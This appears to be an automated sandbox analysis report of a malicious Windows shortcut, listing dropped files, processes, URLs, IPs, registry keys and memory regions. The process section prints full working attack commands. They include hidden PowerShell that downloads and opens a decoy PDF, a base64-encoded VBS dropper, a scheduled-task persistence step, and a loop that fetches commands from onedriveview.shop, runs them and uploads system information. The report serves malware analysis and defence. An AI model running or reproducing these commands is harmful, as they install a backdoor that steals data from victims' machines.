Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Xkci1BfrmX.lnk
|
MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Tue Sep
24 10:15:50 2024, mtime=Tue Sep 24 10:15:50 2024, atime=Tue Sep 24 10:15:50 2024, length=0, window=hide
|
initial sample
|
 |
|
|
C:\Users\Public\Libraries\Libraries.vbs
|
ASCII text, with very long lines (842), with CRLF, LF line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x1a3e94e8, page size 16384, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\10b2b525-9172-4d37-b9d5-5ca454f25ae1.tmp
|
JSON data
|
modified
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4,
UTF-8, version-valid-for 17
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
|
Certificate, Version=3
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.5912
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 25
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI94f19.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gwwgzgf.whw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1twwtksc.o0g.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0yx0i10.mwy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lidzqa2j.xa1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3ofrp4k.uto.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y15y4gvz.z0g.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91tjh1se_a3cio8_4k8.tmp
|
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A94vyju8_a3cioc_4k8.tmp
|
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-09-30 09-30-17-077.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\2c4e8e2b-e55a-4ae2-8888-bc7e68d2c4f5.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\455b4b45-ce7e-4de2-8d5c-da36573e1eab.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\68320fab-9ad9-42a1-81d0-3764c3dc701b.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\a6aeac7b-2aef-42e0-b739-4d8bff13c2ee.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S4B6B3472GS6U6Y1RPJT.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\bfc766e4fe485b53.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 38 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt');
$dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content
C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3
/tr C:\Users\Public\Libraries\Libraries.vbs /f;
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs
/f
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep
(get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random
-min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length
-gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX
$jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep
16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep
(get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random
-min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length
-gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX
$jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep
16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\sklyar.pdf"
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log"
--mojo-platform-channel-handle=2232 --field-trial-handle=1508,i,8450144638513138785,4609180756953587241,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 3 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://onedriveview.shop/api/values/82980464243822115700/refresh81/
|
unknown
|
|
|
|
https://onedriveview.shop/api/va
|
unknown
|
|
|
|
https://onedriveview.shop/api/val
|
unknown
|
|
|
|
https://onedriveview.shop
|
unknown
|
|
|
|
https://onedriveview.shop/api/values/view/sklyar.txt
|
unknown
|
|
|
|
https://onedriveview.shop/api/value
|
unknown
|
|
|
|
https://onedriveview.shop/api/values/refresh81
|
unknown
|
|
|
|
https://onedriveview.sh
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://x1.i.lencr.org/
|
unknown
|
||
|
https://onedriveview.shop/api/values/82980464243822115700/refresh81/3021569784.txt
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://onedriveview.shop/api/values/82980464243822115700/refresh81/9738145602.txt
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://onedriveview.shop
|
unknown
|
||
|
https://onedriveview.shop/api/values/refresh81X
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
|
unknown
|
There are 23 hidden URLs, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
unknown
|
European Union
|
||
|
23.56.162.185
|
unknown
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1ABD6830000
|
trusted library allocation
|
page read and write
|
|
|
|
1ABD5B67000
|
trusted library allocation
|
page read and write
|
|
|
|
2536A6B3000
|
heap
|
page read and write
|
|
|
|
212AD926000
|
heap
|
page read and write
|
|
|
|
212ADC85000
|
heap
|
page read and write
|
|
|
|
1ABD5E8E000
|
trusted library allocation
|
page read and write
|
|
|
|
253685AC000
|
heap
|
page read and write
|
|
|
|
2B4BA7C5000
|
heap
|
page read and write
|
|
|
|
1ABD5C2D000
|
trusted library allocation
|
page read and write
|
|
|
|
25300001000
|
trusted library allocation
|
page read and write
|
|
|
|
212AD95E000
|
heap
|
page read and write
|
|
|
|
2B4BA491000
|
heap
|
page read and write
|
|
|
|
1ABD3EC0000
|
heap
|
page read and write
|
|
|
|
212AD8F8000
|
heap
|
page read and write
|
|
|
|
1B6E42DA000
|
trusted library allocation
|
page read and write
|
|
|
|
25301A62000
|
trusted library allocation
|
page read and write
|
|
|
|
25368520000
|
heap
|
page read and write
|
|
|
|
2B4BA42B000
|
heap
|
page read and write
|
|
|
|
2B4BA437000
|
heap
|
page read and write
|
|
|
|
1ABD3F4D000
|
heap
|
page read and write
|
|
|
|
2B4BA472000
|
heap
|
page read and write
|
|
|
|
1B6E3DE4000
|
trusted library allocation
|
page read and write
|
|
|
|
CB27AFE000
|
stack
|
page read and write
|
||
|
1ABD3EC9000
|
heap
|
page read and write
|
||
|
1D5CB400000
|
heap
|
page read and write
|
||
|
1D5D09A5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B64C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1ABD3F1F000
|
heap
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
1ABD6647000
|
trusted library allocation
|
page read and write
|
||
|
1ABEE110000
|
heap
|
page read and write
|
||
|
1B6FA825000
|
heap
|
page read and write
|
||
|
EBCFCFE000
|
stack
|
page read and write
|
||
|
1B6E3B0F000
|
trusted library allocation
|
page read and write
|
||
|
1D5CB4FE000
|
heap
|
page read and write
|
||
|
E7D2CFE000
|
stack
|
page read and write
|
||
|
7FFD9B7D2000
|
trusted library allocation
|
page read and write
|
||
|
1B6FA596000
|
heap
|
page read and write
|
||
|
2B4BA380000
|
heap
|
page read and write
|
||
|
1D5D0A21000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5F4000
|
trusted library allocation
|
page read and write
|
||
|
E7D2EFF000
|
stack
|
page read and write
|
||
|
2536A755000
|
heap
|
page read and write
|
||
|
1ABD5B3F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B610000
|
trusted library allocation
|
page read and write
|
||
|
E7D33FF000
|
stack
|
page read and write
|
||
|
1D5D0A8E000
|
heap
|
page read and write
|
||
|
1D5CBD1A000
|
heap
|
page read and write
|
||
|
1ABD5B14000
|
trusted library allocation
|
page read and write
|
||
|
1B6E051C000
|
heap
|
page read and write
|
||
|
2536A70A000
|
heap
|
page read and write
|
||
|
7FFD9B781000
|
trusted library allocation
|
page read and write
|
||
|
1D5D09D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D5CB491000
|
heap
|
page read and write
|
||
|
253101B7000
|
trusted library allocation
|
page read and write
|
||
|
EBCFC7E000
|
stack
|
page read and write
|
||
|
1D5D0A02000
|
trusted library allocation
|
page read and write
|
||
|
1B6FA83C000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
1B6E1F10000
|
heap
|
page read and write
|
||
|
1D5D0A00000
|
heap
|
page read and write
|
||
|
1ABD5BED000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0B1D000
|
heap
|
page read and write
|
||
|
1ABD660C000
|
trusted library allocation
|
page read and write
|
||
|
54FE67B000
|
stack
|
page read and write
|
||
|
7FFD9B5DB000
|
trusted library allocation
|
page read and write
|
||
|
1ABEDF01000
|
heap
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
97A817B000
|
stack
|
page read and write
|
||
|
7FFD9B7C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B6E1F16000
|
heap
|
page read and write
|
||
|
7FFD9B7C0000
|
trusted library allocation
|
page read and write
|
||
|
1B6E30E5000
|
trusted library allocation
|
page read and write
|
||
|
1D5CC480000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
1D5CB4B1000
|
heap
|
page read and write
|
||
|
1ABEDEE6000
|
heap
|
page read and write
|
||
|
25368500000
|
trusted library allocation
|
page read and write
|
||
|
1D5D09FF000
|
trusted library allocation
|
page read and write
|
||
|
1B6E3AF8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B5C2000
|
trusted library allocation
|
page read and write
|
||
|
21069680000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
EBCFDFD000
|
stack
|
page read and write
|
||
|
1D5CB502000
|
heap
|
page read and write
|
||
|
1D5D0A55000
|
heap
|
page read and write
|
||
|
8F83B3F000
|
stack
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
8F84D0E000
|
stack
|
page read and write
|
||
|
7FFD9B6D6000
|
trusted library allocation
|
page execute and read and write
|
||
|
2536A716000
|
heap
|
page read and write
|
||
|
7FFD9B5F0000
|
trusted library allocation
|
page read and write
|
||
|
1B6F251F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page read and write
|
||
|
1B6E3FF6000
|
trusted library allocation
|
page read and write
|
||
|
212AD850000
|
heap
|
page read and write
|
||
|
1D5D0D30000
|
remote allocation
|
page read and write
|
||
|
253684F0000
|
heap
|
page readonly
|
||
|
1D5CBC15000
|
heap
|
page read and write
|
||
|
7FFD9B7C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
21069689000
|
heap
|
page read and write
|
||
|
EBCF993000
|
stack
|
page read and write
|
||
|
1B6E0453000
|
heap
|
page read and write
|
||
|
1B6E0625000
|
heap
|
page read and write
|
||
|
97A7A7E000
|
unkown
|
page readonly
|
||
|
1D5D0C60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
25310075000
|
trusted library allocation
|
page read and write
|
||
|
210698D0000
|
heap
|
page read and write
|
||
|
1B6E03F0000
|
heap
|
page read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page read and write
|
||
|
2536A567000
|
heap
|
page read and write
|
||
|
7FFD9B5C4000
|
trusted library allocation
|
page read and write
|
||
|
1D5CC900000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0CC0000
|
trusted library allocation
|
page read and write
|
||
|
EBCFD7F000
|
stack
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0910000
|
trusted library allocation
|
page read and write
|
||
|
1B6E3AE5000
|
trusted library allocation
|
page read and write
|
||
|
97A71DB000
|
stack
|
page read and write
|
||
|
1D5CB479000
|
heap
|
page read and write
|
||
|
8F8413E000
|
stack
|
page read and write
|
||
|
8F83A73000
|
stack
|
page read and write
|
||
|
1D5D0991000
|
trusted library allocation
|
page read and write
|
||
|
1D5CBB40000
|
trusted library allocation
|
page read and write
|
||
|
1B6E42FE000
|
trusted library allocation
|
page read and write
|
||
|
97A967E000
|
unkown
|
page readonly
|
||
|
7FFD9B7B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1ABD40D0000
|
trusted library allocation
|
page read and write
|
||
|
2536A4A0000
|
heap
|
page read and write
|
||
|
212AF380000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B61C000
|
trusted library allocation
|
page execute and read and write
|
||
|
25368561000
|
heap
|
page read and write
|
||
|
54FE5FE000
|
stack
|
page read and write
|
||
|
1D5D0900000
|
trusted library allocation
|
page read and write
|
||
|
1D5CB4AD000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B78A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
1D5CB4B1000
|
heap
|
page read and write
|
||
|
25369FE0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B5F2000
|
trusted library allocation
|
page read and write
|
||
|
E7D2BFE000
|
stack
|
page read and write
|
||
|
1D5D09C0000
|
trusted library allocation
|
page read and write
|
||
|
2536AA50000
|
heap
|
page read and write
|
||
|
7FFD9B5D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1ABD5BE6000
|
trusted library allocation
|
page read and write
|
||
|
1ABEE159000
|
heap
|
page read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page read and write
|
||
|
253011A5000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0990000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
